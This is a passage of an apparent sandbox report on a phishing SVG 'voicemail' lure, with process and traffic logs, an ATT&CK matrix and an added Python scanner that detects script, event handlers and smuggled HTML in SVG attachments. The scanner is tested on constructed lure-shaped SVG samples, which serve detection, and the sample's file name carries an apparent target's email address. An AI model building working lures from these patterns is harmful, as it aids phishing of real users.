          Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknown | Network traffic detected: HTTP traffic on port 55498 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknown | Network traffic detected: HTTP traffic on port 55494 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55498
          Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 55493 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir7948_1329143299
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir7948_1329143299
          Source: classification engine | Classification label: mal80.phis.winSVG@25/26@30/13
          Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7418917361889980763,10513141320866540213,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2196 /prefetch:3
          Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7418917361889980763,10513141320866540213,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2196 /prefetch:3
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
          Source: Window Recorder | Window detected: More than 3 window changes detected
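The process list above shows the sample being handed straight to chrome.exe from the desktop, which is why a .svg can carry a phishing page at all: a browser parses SVG as an XML document, runs any script element it contains, executes on* event attributes, follows javascript: links, and renders HTML nested inside foreignObject. The scanner below is an added example, not Joe Sandbox code and not the Gabagool kit's code; it performs the static checks that the "JavaScript embedded in SVG" and "hidden URLs" signatures express, over three constructed SVG documents (the analysed sample is not reproduced). It uses only the Python standard library; xml.etree does not fetch external entities but will expand internal ones, so for untrusted attachments in production parse with defusedxml instead.

```python
"""Static triage of .svg attachments for embedded script.

Added example, not code from Joe Sandbox or from the Gabagool kit.  The three
SVG documents below are constructed for the example; the analysed sample is
not reproduced here.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
HTML_NS = "http://www.w3.org/1999/xhtml"

# Any attribute named on<event> is executed by the browser as JavaScript.
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
# href/src values that run code or smuggle a second document instead of
# pointing at an image resource.
DANGEROUS_URL = re.compile(r"^\s*(javascript:|data:text/html|data:application/xhtml)", re.I)


def split_tag(tag):
    """Split an ElementTree tag '{ns}name' into (ns, name)."""
    if tag.startswith("{"):
        ns, _, name = tag[1:].partition("}")
        return ns, name
    return "", tag


def scan_svg(data):
    """Return findings for one SVG document as {check: [evidence, ...]}.

    Parse untrusted files with defusedxml in production: xml.etree expands
    internal entities and is exposed to entity-expansion bombs.
    """
    findings = {
        "script_elements": [],   # <script> in the SVG or XHTML namespace
        "event_handlers": [],    # onload=, onclick=, ... on any element
        "dangerous_urls": [],    # javascript: / data:text/html targets
        "foreign_html": [],      # HTML elements nested via <foreignObject>
    }
    root = ET.fromstring(data)
    for el in root.iter():
        ns, name = split_tag(el.tag)
        if name == "script" and ns in (SVG_NS, HTML_NS, ""):
            # External script via href/xlink:href, otherwise the inline body
            # (CDATA is delivered as ordinary text by the parser).
            src = el.get("href") or el.get("{%s}href" % XLINK_NS)
            findings["script_elements"].append(src or (el.text or "").strip()[:60])
        if name == "foreignObject":
            html_children = [split_tag(c.tag)[1] for c in el.iter()
                             if split_tag(c.tag)[0] == HTML_NS]
            findings["foreign_html"].append(", ".join(html_children))
        for attr, value in el.attrib.items():
            aname = split_tag(attr)[1]
            if EVENT_ATTR.match(aname):
                findings["event_handlers"].append("%s@%s" % (name, aname))
            elif aname in ("href", "src") and DANGEROUS_URL.match(value):
                findings["dangerous_urls"].append(value[:60])
    return findings


def is_suspicious(data):
    """True when any check produced evidence; a plain drawing yields False."""
    return any(scan_svg(data).values())


# Constructed sample 1: an ordinary icon, no script.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">
  <circle cx="8" cy="8" r="6" fill="#1e90ff"/>
</svg>"""

# Constructed sample 2: the shape of a voicemail-lure SVG, with an onload
# handler, a javascript: link and an inline script body in CDATA.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="800" height="600" onload="init()">
  <text x="20" y="40">You have a new voicemail</text>
  <a xlink:href="javascript:void(0)"><rect width="120" height="32"/></a>
  <script type="text/javascript"><![CDATA[
    function init() { /* decrypt payload and document.write() the page */ }
  ]]></script>
</svg>"""

# Constructed sample 3: an HTML login form smuggled through <foreignObject>,
# with an iframe whose src is an inline data: document.
SMUGGLED_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="800" height="600">
  <foreignObject width="800" height="600">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <input type="password" name="pw"/>
      <iframe src="data:text/html;base64,PGI+aGk8L2I+"></iframe>
    </body>
  </foreignObject>
</svg>"""


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", LURE_SVG), ("smuggled", SMUGGLED_SVG)):
        print(label, is_suspicious(doc), scan_svg(doc))
```

The checks deliberately stop at "is there executable or smuggled content", which is the question a mail gateway or attachment sandbox has to answer before rendering; what the script does once it runs (here, the AES-decrypted lure and the Turnstile round trip in the traffic above) is a dynamic-analysis question that static triage cannot settle.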
          MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is how many signatures matched that technique)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
          Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
          Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
          Persistence: Browser Extensions (1); Scripting (1); Logon Script (Windows); Login Hook
          Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
          Defense Evasion: Masquerading (1); Process Injection (1); Deobfuscate/Decode Files or Information (1); File Deletion (1)
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
          Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
          Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
          Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (5); Ingress Tool Transfer (3)
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction